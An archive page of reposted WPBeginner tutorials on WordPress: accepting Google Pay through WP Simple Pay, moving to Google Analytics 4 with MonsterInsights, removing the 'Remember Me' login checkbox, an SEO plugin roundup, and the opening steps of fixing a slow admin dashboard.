Backup Archives - Page 50 of 57 - Appunti dalla rete

How to Accept Google Pay in WordPress (The Easy Way)

Would you like to accept Google Pay on your WordPress site?

When you allow your customers to choose their preferred payment method, you’ll build trust and increase conversions on your website.

In this article, we’ll show you how to accept Google Pay in WordPress.

Why Accept Google Pay in WordPress?

If you’re selling products or services on your WordPress website or asking for donations, then it’s important to let your visitors pay using their preferred method.

Often they will want to pay by credit card or PayPal, but newer methods like Google Pay and Apple Pay are becoming more popular.

Google Pay is available in 40 countries around the world and makes online payments simple. However, your customers can only use it if they’re on an Android device running version Lollipop 5.0 or higher, so you’ll probably want to include additional payment options for people using other devices.

That being said, let’s take a look at how to accept Google Pay in your online store.

Note: We’ll cover how to add a Google Pay option in WordPress without adding a full eCommerce cart, but we will leave other helpful resources at the end of this article for those looking for full eCommerce solutions.

How to Accept Google Pay in WordPress

The first thing you need to do is install and activate the WP Simple Pay plugin. For more details, see our step by step guide on how to install a WordPress plugin.

WP Simple Pay is a simple yet powerful WordPress invoicing and payments plugin. The best part is that WP Simple Pay does not charge you any additional transaction fees, and you can set it up without the complexity of a cart system.

It lets you add Apple Pay, Google Pay, credit card as well as ACH bank payments, so you can give users multiple payment options which improves conversion.

While there is a free version of the plugin, you need the Pro plugin to accept Google Pay, create on-site payment forms, and more.

Upon activation, the WP Simple Pay setup wizard will start automatically. You simply need to click the ‘Let’s Get Started’ button to continue.

On the first page, you’ll be asked to enter your license key. You can find this information from your account on the WP Simple Pay website.

After that, you need to click the ‘Activate and Continue’ button to move to the next step.

You’ll Be Asked to Enter Your WP Simple Pay License Key

On the second page, you will need to connect WP Simple Pay to Stripe. Stripe is a popular payment gateway, and it’s the easiest way to add Google Pay to your website. It also supports all top credit and debit cards, Apple Pay, ACH payments, and more.

Simply click the ‘Connect with Stripe’ button, and from there you can log in to your Stripe account or create a new one. Anyone with a legitimate business can create a Stripe account and accept payments online.

You Need to Connect WP Simple Pay to Stripe

Note: Stripe requires your site to be using SSL/HTTPS encryption. If you don’t already have an SSL certificate for your website, then please see our step by step guide on how to add SSL in WordPress.

Once you’ve connected to Stripe, you’ll be asked to configure your WP Simple Pay emails.

The options for payment and invoice emails to your customers have already been enabled for you. So is the option for sending payment notification emails.

You just need to enter the email address where the notifications should be sent.

Once you’ve done that, you need to click the ‘Save and Continue’ button to complete your setup of WP Simple Pay.

Google Pay is enabled by default when using Stripe Checkout, and will be automatically offered to Android users in participating countries.

If you decide to disable Google Pay in the future, then you will need to change the payment method settings in the Stripe Dashboard.

Creating a Payment Form in WordPress

Next, you need to create a payment form.

You can do that by clicking the ‘Create a Payment Form’ button on the last page of the setup wizard. This will automatically take you to the WP Simple Pay » Add New page.

You’ll be shown a list of payment form templates. You need to scroll down until you locate the Apple Pay / Google Pay template.

Simply hover over the template and click the ‘Use Template’ button when it appears.

Select the Apple Pay / Google Pay Template

This will take you to the payment form editor.

If you like, you can rename the form and give it a description. After that, you need to select the ‘Stripe Checkout’ option under Form Type.

After you’ve done that, we’ll move on to the Payment tab.

Here you can set the payment mode to either live or testing. Testing mode will let you make payments that are not actually charged so you can make sure your form is working properly and emails are being sent.

Don’t forget to change this to ‘Live’ when you’ve finished testing and are ready to start receiving payments from your customers.

You can also add the products or services that you offer, along with their prices and whether they are a one-time payment or a subscription.

Simply click the ‘Add Price’ button until you have added as many prices as you need. After that, you will need to add a label and price for each one. You can also select other options, such as recurring payments, or the user can determine the price, as in a donation.

Add Your Products and Services to the Payment Form

You can show or hide a price by clicking the small arrow on the right.

Next, we’ll move on to the ‘Form Fields’ tab. Notice that the essential fields have already been added to the form, including an ‘Apple Pay / Google Pay’ button, credit card details, and a checkout button.

The Essential Form Fields Have Been Added For You

Using the ‘Form Fields’ drop down, you can choose additional fields and add them by clicking the ‘Add Field’ button. Options include name, phone number, address, and much more.

Finally, the ‘Stripe Checkout’ tab allows you to select additional payment methods and tweak the checkout form that is displayed after the user clicks the ‘Pay’ button.

For this tutorial, we’ll leave those settings as they are.

Select any Additional Payment Methods and Tweak the Checkout Form

When you are happy with your payment form, click on the ‘Publish’ button to store your settings and push the form live.

Now we can add the form to a post or page on your website.

Adding the Payment Form to Your Website

WP Simple Pay makes it super easy to add forms anywhere on your website.

Simply create a new post or page, or edit an existing one. Then, click on the plus (+) sign at the top and add a WP Simple Pay block in the WordPress block editor.

Insert a WP Simple Pay Block and Choose the Correct Form

After that, select your order form from the dropdown menu in the WP Simple Pay block.

Once you’re finished, you can update or publish the post or page, and then click on the preview button to see your form in action.

When your users click the Pay button, the Stripe checkout form will be displayed.

If they are using an Android device running Lollipop 5.0 or higher, then the Google Pay option will be displayed at the top of the form. Otherwise, the Google Pay option will be hidden, and your customers can pay using a credit card.

If you’re looking for other ways to add Google Pay in WordPress, then you can use full eCommerce solutions like Easy Digital Downloads or WooCommerce. Both of them have support for Apple Pay and Google Pay options.

We hope this tutorial helped you learn how to accept Google Pay in WordPress. You may also want to learn the right way to create an email newsletter, or check out our expert pick of the best contact form plugins for WordPress.

Source :
https://www.wpbeginner.com/plugins/how-to-accept-google-pay-in-wordpress/

How to Switch to Google Analytics 4 in WordPress (The RIGHT Way)

Are you looking to switch to the latest Google Analytics version?

Google is now recommending website owners to move to the new Google Analytics 4 because they will be sunsetting the previous Universal Analytics on July 1, 2023. After the sunset day, you won’t be able to track data in the older version.

In this article, we’ll show you how to easily switch to Google Analytics 4 in WordPress.

Why Switch to Google Analytics 4?

Google Analytics 4 (GA4) is the latest version of Google Analytics. It lets you track your mobile apps and websites in the same account, and offers new metrics, reports, and tracking features.

If you haven’t created a GA4 property yet, then now is the best time to switch to the latest version. That’s because Google announced that it will be closing down the old Universal Analytics on July 1, 2023.

What this means is that Universal Analytics will no longer receive data from your WordPress website, and it will eventually stop working after the sunset date. That means that all your old analytics data will be lost.

Switching to Google Analytics 4 as soon as possible will protect you from starting from scratch with no historical data.

To do this right, a lot of smart website owners are using the dual tracking method which allows you to continue using the current Universal Analytics while start sending data to GA4.

This way, you can future-proof your data while giving yourself plenty of time to learn the new Google Analytics dashboard and features.

That being said, let’s see how you can switch to Google Analytics 4 in WordPress with dual tracking.

Video Tutorial

https://youtube.com/watch?v=8dihyjwMNnE%3Fversion%3D3%26rel%3D0%26fs%3D1%26showsearch%3D0%26showinfo%3D1%26iv_load_policy%3D1%26wmode%3Dtransparent

Subscribe to WPBeginner

If you’d prefer written instructions, just keep reading.

Creating a Google Analytics 4 Property

If you already have an existing Google Analytics account using the old version, then you can eaily create a new GA4 property and start sending stats to GA4.

First, you’ll need to visit the Google Analytics website and login to your account.

After that, head over to the ‘Admin’ settings page in the bottom left corner.

If you’re on classic Google analytics, then you’ll see the option to setup GA4.

Go ahead and click on ‘GA4 Setup Assistant’ under the Property column.

In the next step, the setup assistant will give you 2 options. You can create a new Google Analytics 4 property or connect an existing one.

Since we’re setting up a new property, simply click the Get Started button under the ‘I want to create a new Google Analytics 4 property’ option.

A popup will now appear with the details about the setup wizard.

If you’ve implemented your Universal Analytics using the Global Site Tag (gtag.js) code, then you’ll see an option to Enable data collection using existing tags.

This uses the existing tracking code on your site to collect information. That said, if you don’t already have the right tracking code on your website, we’ll show you how to add it to your WordPress blog below.

For now, you can go ahead and click the ‘Create property’ button.

The setup wizard will add a new GA4 property and copy the Universal Analytics property name, website URL, timezone, and currency settings.

You can now view your new Google Analytics 4 property in the GA4 Setup Assistant.

Next, you’ll need to click on the ‘See your GA4 property’ button to see your Google Analytics tracking code.

After clicking on the button, simply click on the ‘Tag installation’ option to retrieve your tracking code.

You should now see your new GA4 property under Data Streams.

Go ahead and click on your new property.

A new window will slide in from the right, and you’ll be able to see your web stream details.

Note: Google Analytics 4 uses both ‘data stream’ and ‘web stream’. These both simply mean the flow of analytics data that Google Analytics receives from your website.

Simply scroll down to Tagging Instructions section and click the Global site tag (gtag.js) option to expand the settings. You’ll now see your Google Analytics tracking code that needs to be added to your WordPress site.

One thing you need to know is that Google Analytics 4 reports are quite different than what you’re used to in Universal Analytics.

They have introduced new terminology, and many familiar metrics and reports are missing completely. Basically if you were using common reports like the Top Landing Pages report or others, then you’d have to recreate those from scratch in Google Analytics 4.

That’s why we recommend using MonsterInsights Pro or even the free version of MonsterInsights.

It will help you see all the familiar analytics reports right in your WordPress dashboard, and it also lets you use both Universal Analytics and Google Analytics 4 at the same time.

Not to mention, with MonsterInsights you get all the powerful tracking features such as outbound link tracking, author tracking, and more which can be enabled without writing any code.

Let’s take a look at how to easily set up Google Analytics 4 on your WordPress site with MonsterInsights.

Adding Google Analytics Tracking Code to WordPress Site

The best way to add Google Analytics tracking code to your WordPress website is by using MonsterInsights. This is the plugin that we use on WPBeginner.

MonsterInsights is the best Analytics solution for WordPress, and it’s trusted by over 3 million websites because it lets you easily setup advanced tracking without any coding skills.

You can use the MonsterInsights Lite version to set up Google Analytics in no time. There are also premium MonsterInsights plans that offer more features like custom dashboard reports, email summaries, scroll tracking, eCommerce tracking, premium integrations, and more.

MonsterInsights also offers dual tracking, meaning you can use both Universal Analytics and Google Analytics 4 at the same time. This is available in both the free version as well paid, and we highly recommend using this to ensure that your transition to GA4 goes smoothly.

First, you’ll need to install and activate the MonsterInsights plugin. For more details, please see our guide on how to install a WordPress plugin.

Upon activation, you’ll be taken to the MonsterInsights welcome screen in your WordPress dashboard. Simply click the ‘Launch the Wizard’ button to add Google Analytics to your site.

After clicking the button, the setup wizard will ask you to choose a category that best describes your website.

You can choose from a business website, publisher (blog), or online store. Once you’ve selected a category, click the ‘Save and Continue’ button.

In the next step, you’ll need to connect MonsterInsights with your WordPress site.

Go ahead and click the ‘Connect MonsterInsights’ button.

Once you click the button, you’ll need to sign in to your Google Account.

Simply select your account and click the ‘Next’ button.

Next, MonsterInsights will require access to your Google Analytics Account.

MonsterInsights App needs these permissions, so it can help you setup analytics properly and show you all the relevant stats right inside your WordPress dashboard.

You can click the ‘Allow’ button to continue.

After that, you’ll be redirected back to the MonsterInsights setup wizard.

To complete the connection, select your Google Analytics 4 property from the dropdown menu and click the ‘Complete Connection’ button.

Next, MonsterInsights will connect Google Analytics with your WordPress website.

On the next screen, you’ll see some recommended settings like file download tracking and affiliate link tracking.

You can use the default settings in the setup wizard. However, if you’re using an affiliate link plugin, then you’ll need to enter the path you use to cloak the affiliate links.

Next, you can scroll down and select who can see reports and add different WordPress user roles.

Once you’re done, click the ‘Save and continue’ button.

After that, MonsterInsights will show different tracking features that you can enable for your website.

You can scroll down and click the ‘Skip for Now’ button.

Choose which tracking features to enable

Next, you’ll see a checklist showing that you’ve successfully connected Google Analytics to your website.

For example, it will show that you’re successfully connected to Google Analytics, the tracking code is properly installed, and the data is being collected.

That’s it, you’ve added Google Analytics 4 property to your WordPress site.

Creating a Measurement Protocol API Secret

If you want to MonsterInsights to track eCommerce purchases, form conversions, and more advanced tracking in Google Analytics, then you’ll need to create a Measurement Protocol API Secret.

First, you’ll need to go back to your Google Analytics account and then go to Admin settings. Next, click on the ‘Data Streams’ option under Property column.

Then you’ll need to select the Google Analytics 4 property that we created earlier.

Go ahead and select your property under Data Streams.

After that, you can scroll down to the ‘Advanced Settings’ section.

Simply click the ‘Measurement Protocol API secrets’ option.

Select measurement protocol API secrets option

A new window will now slide in with your Measurement Protocol API secrets.

You will have to click the ‘Create’ button.

After that, enter a nickname for your API secret so it’s easily identifiable.

When you’re done, click the ‘Create’ button.

You should now see your Measurement Protocol API secret.

Simply copy the API secret under the ‘Secret value’ field.

After that, you can head back to your WordPress website and navigate to Insights » Settings from your dashboard.

Now click on the ‘General’ tab at the top.

Next, you will have to scroll down to the ‘Google Authentication’ section.

Go ahead and enter the Secret value you just copied in the Measurement Protocol API Secret field.

Enter measurement protocol API secret in MonsterInsights

You’ve successfully added Measurement Protocol API Secret in MonsterInsights.

Setting Up Universal Analytics Dual Tracking

Now that you have setup GA4, the next step is to enable dual tracking for Universal Analytics, so it can run alongside your Google Analytics 4 property in WordPress.

With MonsterInsights, you can easily set up dual tracking and simultaneously track both properties without writing code.

Note: If you already have Universal Analytics tracking code added to your WordPress website, then we recommend disabling it first. Otherwise, it could lead to double-tracking and can skew your data.

To start setting up dual tracking properly, you can head to Insights » Settings from your WordPress admin panel and then click on the ‘General’ tab.

Next, you’ll need to scroll down to the ‘Google Authentication’ section.

Now under the Dual Tracking Profile, enter your Universal Analytics (UA) code.

You can easily find your UA code in Google Analytics Admin settings.

Simply go to the Admin settings page in Google Analytics of your Universal Analytics property.

Then click on ‘Property Settings’ under the Property column.

You should see the Tracking Id, and it will look like this: UA-123856789-5

You’ve now successfully set up dual tracking on your WordPress website.

To see how your website is performing, simply go to Insights » Reports. Here you’ll find all the data you need to make the right decisions to grow your website.

We hope this article helped you learn how to switch to Google Analytics 4 in WordPress. You may also want to see our ultimate WordPress SEO guide to improve your rankings, or see our comparison of the best email marketing services for small business.

Source :
https://www.wpbeginner.com/wp-tutorials/how-to-switch-to-google-analytics-4-in-wordpress/

How to Remove the Remember Me Option from WordPress Login

Do you want to remove the remember me option from your WordPress login page?

The ‘Remember Me’ option is a small checkbox that lets you and your users save their username and password on the WordPress login screen.

In this article, we’ll show you how to remove the ‘Remember Me’ option, step by step.

How to Remove the Remember Me Option from Your WordPress Login (2 Ways)

Why Remove ‘Remember Me’ from Your WordPress Login Screen?

When you or your website users check the ‘Remember Me’ box on the WordPress login page, it will store that information in a browser cookie for 2 weeks.

That means that next time they’re on your site, they can access the dashboard right away without having to go to the login page again.

Although it makes logging in faster, it could be a potential security risk for people accessing their WordPress admin area from public computers and WiFi networks.

By disabling the ‘Remember me’ checkbox, you and your users will have to log in every time the web browser is closed. They can still save their username and password in their browser’s storage or a password manager app so they don’t have to type it in every time.

Overall, this improves your WordPress security and helps to keep your website safe from hackers.

With that said, let’s show you how to remove the ‘Remember Me’ option on your WordPress login page. Simply use the quick links below to jump straight to the method you want to use.

The easiest way to remove the remember me option from the default WordPress page is by using the Remember Me Controls plugin.

First thing you need to do is install and activate the plugin. For more details, see our beginner’s guide on how to install a WordPress plugin.

Note: We’ve tested the plugin as of this post’s last updated date, and it works with WordPress 6.0 with no issues.

Upon activation, navigate to Settings » Remember Me to configure the plugin settings.

Then, simply check the box in the ‘Disable the “Remember Me” feature’ section and click the ‘Save Changes’ button.

Now, you can log out of your WordPress site.

When you return to the login screen, the ‘Remember Me’ checkbox will be disabled.

If you’re creating a custom WordPress login page for your WordPress membership site or online store, then you can hide the ‘Remember Me’ option by using SeedProd.

SeedProd is the best drag and drop WordPress page builder in the market used by over 1 million websites. You can use it to create a completely custom WordPress theme without writing any code.

Aside from create custom WordPress themes, SeedProd also comes with the ability to create custom WordPress login pages, custom 404 pages, and more.

First, you will need to use SeedProd plugin to create a custom login page. For more details, see our step by step guide on how to create a custom login page.

Then, when you’re customizing the login page, you can disable the ‘Remember Me’ option by clicking on the ‘Additional Options’ drop down in the left-hand options menu.

Click additional options in page builder

Next, delete the text in the ‘Remember User Label’ box.

Then, click the ‘Save’ button and select the ‘Publish’ drop down to make your login page live.

Now, you can visit your custom login page to see the ‘Remember Me’ option is gone.

We hope this article helped you learn how to remove the remember me option from your WordPress login page. You may also want to see our ultimate guide on how to speed up WordPress, and our expert picks of the best business phone services for small businesses.

Source :
https://www.wpbeginner.com/plugins/how-to-remove-the-remember-me-option-from-your-wordpress-login/

14 Best WordPress SEO Plugins and Tools That You Should Use

Often we’re asked about what are the best WordPress SEO plugins and tools that we recommend.

That’s because search engines are a major source of traffic for most websites on the internet. Optimizing your website for search engines can help you rank higher in search results and significantly grow your business.

In this article, we will share the best WordPress SEO plugins and tools that you should use. Some of these tools offer similar functionalities, so we will also highlight which ones are the best for specific use-cases.

Things You Must Know About WordPress SEO Plugins & Tools

When reading SEO WordPress tips or searching for “best free WordPress SEO plugins”, you will come across articles that feature several dozen tools.

This can be quite overwhelming for beginners and non-techy users.

The truth is that you don’t need dozens of top SEO tools to get higher search engine result rankings.

While most blog posts (including ours) will share the top most popular SEO plugins, it is extremely important for you to understand the use-cases of each tool.

For example, you never want to use more than one WordPress SEO plugin on your website. We will mention All in One SEO (formerly All in One SEO Pack), Yoast SEO, SEOPress, and Rank Math. You need to pick only one to avoid plugin conflict.

We’ll mention SEMRush, Ahrefs, and few other powerful tools, but you don’t need them all when you’re first starting out since they have a similar feature set. We will share what tools we use in our business, and which features are the best among each tool.

With that said, let’s take a look at our expert pick of the best WordPress SEO plugins and tools.

1. All in One SEO for WordPress (AIOSEO)

All in One SEO for WordPress (AIOSEO) is the best WordPress SEO plugin on the market. Used by over 3+ million users, it is the most comprehensive SEO toolkit that helps you improve search rankings without learning any complicated SEO jargon.

The free version of AIOSEO has all the essential features, but the pro version gives you everything you need to outrank your competitors.

It comes with the easiest setup wizard that automatically helps you choose the best SEO settings for your business. AIOSEO shows you TruSEO on-page analysis with an actionable checklist to optimize your posts and pages.

The on-page SEO checklist includes a smart meta tag generator where you can use dynamic values (current year, month, day, custom fields, author info, and much more) in your SEO title and meta descriptions. This means you don’t need to update a post just to change SEO titles.

All in One SEO (AIOSEO) dynamic meta title and description

AIOSEO also comes with Rich snippet schema markup, smart XML sitemaps (with advanced controls), SEO health check, and other useful features to grow your search engine visibility.

There is a built-in social media integration to add Open Graph metadata as well. This means you can choose which image or thumbnail you want to show when your pages are shared on social media websites like Facebook, Twitter, Pinterest, etc.

All in One SEO for WordPress (AIOSEO) social media profiles

AIOSEO also comes with built-in WooCommerce SEO tools for eCommerce sites. This includes features like dynamic optimizations, individual product page optimizations, product image SEO, and other handy features to bring more organic traffic to your online store.

For more SEO savvy users, it includes full control of RSS feeds, Robots.txt editor, local SEO, breadcrumbs, Google News sitemaps, video SEO, advanced redirect manager, 404 tracking, IndexNow integration, and more.

For business owners, it comes with SEO user roles, so you can manage access to important SEO features without handing over control of your website.

Update: Recently AIOSEO added a Link Assistant which is a game-changer for internal linking. It helps identify link opportunities, gives you linking suggestions in real-time, and you can bulk-add internal links with just a few clicks.

Overall, All in One SEO (AIOSEO) is the most beginner-friendly and comprehensive WordPress SEO plugin on the market. It’s easy to configure and eliminates the need to install multiple plugins to do things on your WordPress site. It works perfectly for all types of businesses, eCommerce, blogs, news, and other websites.

As a WPBeginner user, you get 50% off AIOSEO Pro.

For those who’re on a budget, you can use the free version of AIOSEO to get started.

2. SEMRush

SEMRush is the best overall SEO tool on the market. Used by professional SEO experts, marketers, bloggers, large and small businesses, it provides a comprehensive set of tools to grow your traffic.

You can use it to find organic keywords and search terms that you can easily rank for. It also allows you to do competitive research and see which keywords your competitors rank for, and how you can beat them.

SEMRush SEO Writing Assistant tool helps you improve your website content to beat the top 10 results for your focus keyword. It integrates with WordPress, and this will help you write more SEO-friendly content.

You can also generate SEO templates and get easy search engine optimization suggestions for your content along with advanced SEO recommendations.

SEMRush seamlessly integrates with All in One SEO (AIOSEO) to help you find additional keyphrases for your focus keyphrase. You can see related keyphrases and their search volume right from WordPress. Then, you can add them to your content with the click of a button.

To learn more, see our complete guide on how to do keyword research for your website.

We use SEMRush for our websites because of their competitive intelligence and SEO rank tracker features.

3. Google Search Console

Google Search Console is a free tool offered by Google to help website owners and webmasters monitor and maintain their site’s presence in Google search results.

It alerts you when Google is unable to crawl and index pages on your website. You also get helpful tips on how to fix those crawl errors.

Most importantly, it shows which keywords your website is ranking for, anchor texts, average position, impressions, and more. You can use this data to find keywords where you can easily rank higher by simply optimizing your content. You can also use this keyword data to come up with new blog post ideas.

For more details, see our comprehensive Google Search Console guide for beginners.

Tip: You can use MonsterInsights to track your keyword rankings inside WordPress admin area using Google Seach Console data. We will cover this tool later in the article below.

4. Yoast SEO

Yoast SEO is a popular WordPress SEO plugin that allows you to optimize your WordPress website for search engines.

It lets you easily add SEO titles and descriptions to all posts and pages on your website. You can also use it to add Open Graph metadata and social media images to your articles.

Yoast SEO automatically generates an XML sitemap for all your website content which makes it easier for search engines to crawl your website. It also helps you easily import your SEO data if you have been using another SEO plugin.

Other features include readability analysis, Google and social previews, and faster load times for a better user experience.

For more details, see our complete guide on how to install and set up Yoast SEO plugin in WordPress.

5. Google Keyword Planner

Google Keyword Planner tool helps you generate your own keyword ideas from Google itself.

No one on the planet has more insights into what people are searching for than the search giant Google. This free tool is offered to Google’s advertisers for free and anyone can use it. Its main purpose is to show advertisers the keywords they can bid on for their advertising campaigns.

It also helps advertisers choose the right keywords by showing them an estimate of search volume, number of results, and difficulty level.

As a content marketer or blogger, you can use this data to find keywords with high search volume, high advertiser interest, and more importantly keywords where you can easily outrank all other sites.

Bonus: See these 103 Blog Post Ideas that your Readers will Love (Cheat Sheet).

6. Ahrefs

Ahrefs is an all-in-one SEO analysis tool for marketers, bloggers, and businesses. It is a popular alternative to SEMRush and offers a lot of similar tools and features.

It allows you to do keyword research, competition analysis, backlink research, SEO audit, monitor keyword rankings, and more.

It also offers a detailed content analysis tool that helps you improve content while targeting specific keywords.

While there’s a huge feature overlap, what Ahrefs does really well is backlink analysis. We can use it to see which sites are linking to multiple competitors, but not us. This helps us get more backlinks and build more partnerships.

They also help us identify which content multiple of our competitors are ranking for that we aren’t, so we can create content on those subjects to get more exposure.

Last but not least, Ahrefs helps us better identify duplicate content and keyword cannibalization which helps us merge and upgrade the right content to boost our rankings.

For the reasons above, we pay for both SEMRush and Ahrefs because they’re both good for specific use-cases.

7. SEOPress

SEOPress is another simple yet powerful WordPress SEO plugin. It includes all the features you would expect from an SEO plugin like meta title, description, open graph support, image and content XML sitemaps, redirects, and more.

It comes with a straightforward setup for beginners and advanced controls for more experienced users. It is comparable to other top WordPress SEO plugins on the market in terms of features and options.

The paid version of the plugin is cheaper than some other premium WordPress SEO plugins on the market.

Note: SEOPress is a WordPress SEO plugin. Remember, you only need one WordPress SEO plugin on your site.

8. Rank Math

Rank Math is another user-friendly WordPress SEO plugin that allows you to optimize your website for search engines and social media. It comes with a setup wizard and allows you to import data from other SEO plugins during the setup.

You can use it to easily add meta title, description, and Open Graph metadata to your blog posts. The plugin also allows you to generate an XML sitemap, connect Google Search Console, and control access to plugin features based on user roles.

Note: Rank Math is an AIOSEO alternative. Remember, you only need one WordPress SEO plugin on your site.

9. Schema Pro

Schema Pro allows you to add rich snippets to your website which makes it stand out in search results.

Rich Snippets allow you to make your website stand out in search results by showing star ratings below a review, prices below a product, image or video next to the description, and so on.

Top WordPress SEO plugins, like All in One SEO (AIOSEO) already add structured rich snippets data to your website. However, if you need more schema types or want to extend the functionality of your existing WordPress SEO plugin then Schema Pro is the way to go.

Schema Pro also allows you to use it alongside your existing WordPress SEO plugin by mapping the plugin data to Schema Pro fields.

10. KeywordTool.io

KeywordTool.io is one of the best free keyword research tools available right now. It allows you to simply generate keyword ideas by typing in a keyword. These keyword suggestions are gathered from Google’s autosuggest feature. It also shows you keyword suggestions from Bing, YouTube, Amazon, and more.

These keyword suggestions are a treasure of information. You can also get search volume, cost per click, and other data for each keyword by upgrading to their paid plan.

11. Redirection

Redirection helps you set up SEO friendly redirects in WordPress. It is a handy broken link checker that helps you easily fix 404 errors in WordPress by setting up redirects.

Broken links can affect your site’s SEO and create a bad experience for your users. If you have been running a blog for some time, then you should check your site from time to time for broken links and fix them.

There are multiple ways to easily find broken links in WordPress. Once you find a broken link, you may need to fix it by pointing users to the correct link or removing the incorrect link.

For more details, see our step by step guide on how to find and fix broken links in WordPress.

Alternative: AIOSEO Advanced Redirects is a powerful alternative to the Redirection plugin.

12. SEOQuake

SEOQuake is a useful SEO tool for website owners. It is available as a browser add-on for Google Chrome, Mozilla Firefox, Opera, and Safari web browsers.

It provides SEO related information for any website. This data includes page health, age, last updated, Alexa rank, and many other parameters. It is one of the most downloaded browser addons by SEO professionals.

Apart from that, the SEOQuake toolbar can show you all the same data search results when you type in a keyword. This information can be extremely useful if you are gauging competition for different keywords. You can even download search results in CSV format and prepare your own excel sheets of search data.

Alternative: Ahrefs SEO Toolbar

Bonus Plugins for WordPress Website Owners

These tools give you the additional advantage when optimizing your website for SEO. They do not advertise themselves as SEO tools but they are essential for every website and play a significant role in your website’s search performance.

13. WP Rocket

Site speed is a major factor in search rankings. That’s why you need to monitor your website speed & performance to make sure it’s not affecting your SEO.

The easiest way to boost your website speed is by enabling caching. WP Rocket is the best WordPress caching plugin on the market, which allows you to set up caching without diving into any technical stuff.

Alternative: WP Super Cache

14. MonsterInsights

Many beginners rely on their best guess to make their marketing decisions. You don’t need to do that when you can easily get the insights you need to improve your website’s SEO strategy.

MonsterInsights is the best Google Analytics plugin for WordPress. It allows you to easily install Google Analytics in WordPress and shows human-readable reports inside your WordPress dashboard.

It tells you where your users are coming from, your top content, what users do on your website, and more. It also allows you to track your eCommerce SEO by seeing which products are popular and where you are losing customers.

Bonus tip: See what other marketing data you must track on your website to grow your business.

Other Powerful Growth Tools:

Aside from the above plugins, we also recommend the following tools to increase your traffic and conversions from SEO visitors:

PushEngage – connect and engage with SEO visitors after they leave your website with web push notifications.
OptinMonster – convert abandoning visitors into email subscribers & customers.
Constant Contact – stay in touch with SEO visitors through email marketing.
WPForms – get more leads from your SEO traffic with #1 WordPress form builder.
SeedProd – create SEO friendly custom landing pages with drag & drop WordPress page builder (no coding needed).

We hope this article helped you find the best WordPress SEO plugins and tools for your website. You may also want to see our proven tips to easily increase your website traffic, and our comparison of best chatbot software to boost conversions.

Source :
https://www.wpbeginner.com/showcase/9-best-wordpress-seo-plugins-and-tools-that-you-should-use/

How to Fix a Slow Loading WordPress Dashboard (Step by Step)

Is your WordPress dashboard loading too slow?

Having a slow loading WordPress dashboard is annoying, and it hurts overall productivity when it comes to creating content and managing your website. Also the underlying cause of a slow WordPress dashboard can also impact your website conversions.

In this article, we’ll show you how to easily fix a slow loading WordPress dashboard, step by step.

Fixing a slow loading WordPress admin area

What Causes a Slow Loading WordPress Dashboard?

A slow loading WordPress dashboard can be caused by a number of reasons, but the most common one is limited server resources.

Most WordPress hosting providers offer a set number of resources for each hosting plan. These resources are enough to run most websites.

However, as your WordPress website grows, you may notice slight performance degradation or slower loading across the board. That’s because more people are now accessing your website and consuming server resources.

For the front end section of your website which is what your visitors likely see, you can easily install a WordPress caching plugin to overcome WordPress speed and performance issues.

However, the WordPress admin area is uncached, so it requires more resources to run at the optimal level.

If your WordPress dashboard has become annoyingly slow, then this means a WordPress plugin, a default setting, or something else on the site is consuming too many resources.

That being said, let’s take a look at how to troubleshoot and fix the slow loading WordPress admin dashboard.

Here is an overview of the steps we’ll cover in this article.

1. How to Test Performance of WordPress admin area

Before making any changes, it’s important to measure the speed of your WordPress admin area, so you can get an objective measurement of any improvement.

Normally, you can use website speed test tools to check your website’s speed and performance.

However, the WordPress admin area is behind a login screen, so you cannot use the same tools to test it.

Luckily, many modern desktop browsers come with built-in tools to test the performance of any web page you want.

For example, if you’re using Google Chrome, then you can simply go to the WordPress dashboard and open the Inspect tool by right-clicking anywhere on the page.

This will split your browser screen and you will see the Inspect area in the other window either at the bottom or side of your browser window.

Inside the Inspect tool, switch to the Lighthouse tab and click on the Generate Report button.

This will generate a report similar to the Web Vitals report generated by Page Speed Insights.

From here, you can see what’s slowing down your WordPress admin area. For instance, you can see which JavaScript files are taking up more resources and affecting your server’s initial response time.

2. Install WordPress Updates

The core WordPress team works hard on improving performance with each WordPress release.

For instance, the block editor team tests and improves performance in each release. The performance team works on improving speed and performance across the board.

If you are not installing WordPress updates, then you are missing out on these performance improvements.

Similarly, all top WordPress themes and plugins release updates that not only fix bugs but also address performance issues.

To install updates, simply go to Dashboard » Updates page to install any available updates.

For more details, see our guide on how to properly update WordPress (infographic).

3. Update the PHP Version Used by Your Hosting Company

WordPress is developed using an open-source programming language called PHP. At the time of writing this article, WordPress requires at least PHP version 7.4 or greater. The current stable version available for PHP is 8.1.6.

Most WordPress hosting companies maintain the minimum requirements to run WordPress, which means they may not be using the latest PHP version out of the box.

Now, just like WordPress, PHP also releases new versions with significant performance improvements. By using an older version, you are missing that performance boost.

You can view which PHP version is used by your hosting provider by visiting the Tools » Site Health page from your WordPress dashboard and switching to the ‘Info’ tab.

Luckily, all reliable WordPress hosting providers offer an easy way for customers to upgrade their PHP version.

For instance, if you are on Bluehost, then you can simply login to your hosting control panel and click on the Advanced tab in the left column.

From here, you need to click on the MultiPHP Manager icon under the Software section.

On the next page, you need to select your WordPress blog and then select the PHP version that you want to use.

For other hosting companies, see our complete guide on how to update your PHP version in WordPress.

4. Increase PHP Memory Limit

Your web hosting server is like any other computer. It needs memory to efficiently run multiple applications at the same time.

If there is not enough memory available for PHP on your server, then it would slow down your website and may even cause it to crash.

You can check the PHP memory limit by visiting Tools » Site Health page and switching to the Info tab.

You’ll find PHP memory limit under the Server section. If it is less than 500M, then you need to increase it.

You can increase PHP memory limit by simply entering the following line in your wp-config.php file.

1	`define(` `'WP_MEMORY_LIMIT',` `'512M');`

For more details, see our article on increasing the PHP memory limit in WordPress.

5. Monitor WordPress Plugins for Performance

Some WordPress plugins may run inside the WordPress admin area. If plugin authors are not careful, their plugins can easily consume too many resources and slow down your WordPress admin area.

One way to find out about such plugins is by installing and activating the Query Monitor plugin. For more details, see our step by step guide on how to install a WordPress plugin.

Upon activation, the plugin will add a new menu item to your WordPress toolbar.

Clicking on it will show performance results for the page you are currently viewing on your website.

This will bring up the Query Monitor console.

Here you need to switch to ‘Queries by Component’ tab on the left side. From here, you can see the performance impact of plugins and find out which one is taking up too many resources.

You can now temporarily disable the slow plugins and see if that improves performance.

If it does, then you can reach out to plugin author and seek support or find an alternative plugin.

6. Install a WordPress Caching Plugin

WordPress caching plugins not only improve your website speed, but they can also help you fix a slow loading admin dashboard.

A good WordPress caching plugin helps you optimize page load speed, CSS and JavaScript delivery, your WordPress database, and more.

This frees up resources on your WordPress hosting server that your WordPress admin area can utilize for improved performance.

